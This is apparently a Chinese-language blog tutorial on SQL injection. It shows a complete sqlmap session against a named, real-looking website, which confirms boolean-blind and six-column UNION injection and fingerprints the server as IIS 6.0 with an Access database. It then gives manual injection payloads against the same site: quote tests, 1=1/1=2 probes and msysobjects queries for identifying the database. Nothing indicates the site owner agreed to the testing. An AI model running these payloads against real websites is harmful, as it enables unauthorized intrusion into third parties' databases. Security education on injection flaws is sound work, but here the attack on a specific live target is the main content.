1、sql注入漏洞是怎么产生的。
程序开发过程中不注意规范书写sql语句和对特殊字符进行过滤,导致客户端可以通过全局变量POST和GET提交一些sql语句正常执行。
2、使用sqlmap进行实战。

root@instance-ce9256h8:~# sqlmap -u http://www.kfzhongzhou.com/cyjb_xx.asp?id=14
___
__H__
___ ___[.]_____ ___ ___ {1.2.6#stable}
|_ -| . [,] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 09:05:31

[09:05:32] [INFO] testing connection to the target URL
[09:05:32] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[09:05:32] [INFO] testing if the target URL content is stable
[09:05:33] [INFO] target URL content is stable
[09:05:33] [INFO] testing if GET parameter 'id' is dynamic
[09:05:33] [INFO] confirming that GET parameter 'id' is dynamic
[09:05:33] [INFO] GET parameter 'id' is dynamic
[09:05:33] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'Microsoft Access')
[09:05:33] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'Microsoft Access'. Do you want to skip test payloads specific for other DBMSes? [Y/n] n
for the remaining tests, do you want to include all tests for 'Microsoft Access' extending provided level (1) and risk (1) values? [Y/n] n
[09:08:26] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:08:26] [WARNING] reflective value(s) found and filtering out
[09:08:27] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="65858052")
[09:08:27] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:08:27] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[09:08:27] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[09:08:27] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[09:08:27] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[09:08:27] [INFO] testing 'MySQL inline queries'
[09:08:27] [INFO] testing 'PostgreSQL inline queries'
[09:08:27] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[09:08:27] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[09:08:27] [WARNING] time-based comparison requires larger statistical model, please wait............. (done)
[09:08:29] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[09:08:29] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[09:08:29] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[09:08:29] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[09:08:29] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[09:08:30] [INFO] testing 'Oracle AND time-based blind'
[09:08:30] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[09:08:30] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[09:08:30] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[09:08:30] [INFO] target URL appears to have 6 columns in query
[09:08:39] [INFO] target URL appears to be UNION injectable with 6 columns
[09:08:41] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 89 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=14 AND 8567=8567

Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: id=-6399 UNION ALL SELECT NULL,CHR(113)&CHR(122)&CHR(122)&CHR(122)&CHR(113)&CHR(119)&CHR(100)&CHR(73)&CHR(84)&CHR(66)&CHR(104)&CHR(105)&CHR(113)&CHR(69)&CHR(113)&CHR(106)&CHR(101)&CHR(79)&CHR(78)&CHR(76)&CHR(79)&CHR(80)&CHR(122)&CHR(80)&CHR(116)&CHR(97)&CHR(120)&CHR(70)&CHR(116)&CHR(108)&CHR(68)&CHR(119)&CHR(110)&CHR(66)&CHR(107)&CHR(85)&CHR(108)&CHR(115)&CHR(97)&CHR(101)&CHR(86)&CHR(113)&CHR(77)&CHR(84)&CHR(81)&CHR(113)&CHR(98)&CHR(118)&CHR(112)&CHR(113),NULL,NULL,NULL,NULL FROM MSysAccessObjects%16
---
[09:09:23] [INFO] testing Microsoft Access
[09:09:23] [INFO] confirming Microsoft Access
[09:09:23] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[09:09:23] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 42 times
[09:09:23] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.kfzhongzhou.com'

[*] shutting down at 09:09:23
从以上内容可以得知该网站使用的是access数据库 Internet 信息服务(IIS)管理器用的是iis6.0 脚本语言是asp 操作系统是Windows server 2003或者Windows xp。
Access手工注入:
(1)判断是否存在sql注入
粗略型:提交' #http://www.kfzhongzhou.com/cyjb_xx.asp?id=14' Microsoft JET Database Engine 错误 '80040e14'
字符串的语法错误 在查询表达式 'id=14'' 中 存在sql注入
逻辑型:
数字型注入: and 1=1 / and 1=2
字符型注入: 'and'1'='1 / 'and'1'='2
搜索型注入: %' and 1=1 and '%'='% / %' and 1=2 and '%'='%
(一)加引号法
http://www.kfzhongzhou.com/cyjb_xx.asp?id=14
输出:

Microsoft JET Database Engine 错误 '80040e14'
字符串的语法错误 在查询表达式 'id=14'' 中。
/cyjb_xx.asp,行 69
如以上输出那么网站就是存在sql注入
(二)id变量后加-1
http://www.kfzhongzhou.com/cyjb_xx.asp?id=14-1
有很多的网站都过滤了单引号,我们就可以在id变量后面输入"-1" ,就会返回一个不同的正常界面,因为就相当输入了http://www.kfzhongzhou.com/cyjb_xx.asp?id=14
(三)使用1=1和1=2去判断注入
“加引号”法很直接,也很简单,但是对SQL注入有一定了解的程序员在编写程序时,都会将单引号过滤掉。如果再使用单引号测试,就无法检测到注入点了。这时,就可以使用经典的“1=1和1=2”法进行检测。
如果正常页面链接地址为:http://www.kfzhongzhou.com/cyjb_xx.asp?id=14,在浏览器中分别输入以下两个链接地址,分别查看它们返回的结果值。
http://www.kfzhongzhou.com/cyjb_xx.asp?id=14 and 1=1
http://www.kfzhongzhou.com/cyjb_xx.asp?id=14 and 1=2
如果存在注入点的话,浏览器将会分别显示为:
and 1=1 内容与正常页面显示的结果基本相同。
and 1=2 提示BOF或EOF(程序没做任何判断时),或提示找不到记录,或显示内容为空(程序加了on error resume next)
原理就是:看他有没有在数据库中执行过,and 1=1 永远为真所以页面返回正常,and 1=2永远为假所以返回的结果会出错,根据他的结果来判断有没有sql注入。
(2)判断数字库类型

and exists (select * from msysobjects) >0
and exists (select * from sysobjects) >0
一般情况下,Microsoft Access的系统表是msysobjects,默认状态下用户没有访问权限,而Microsoft SQL Server的系统表是sysobjects,默认状态下用户是有访问权限的。
若数据库是Microsoft SQL Server,且没有进行参数的过滤,则运行第一个语句后,显示的页面是正常的,第二条语句的结果是异常的;若数据库是Microsoft Access,那么两个链接得到的页面都是异常的。

0

正因为生来什么都没有,因此我们能拥有一切。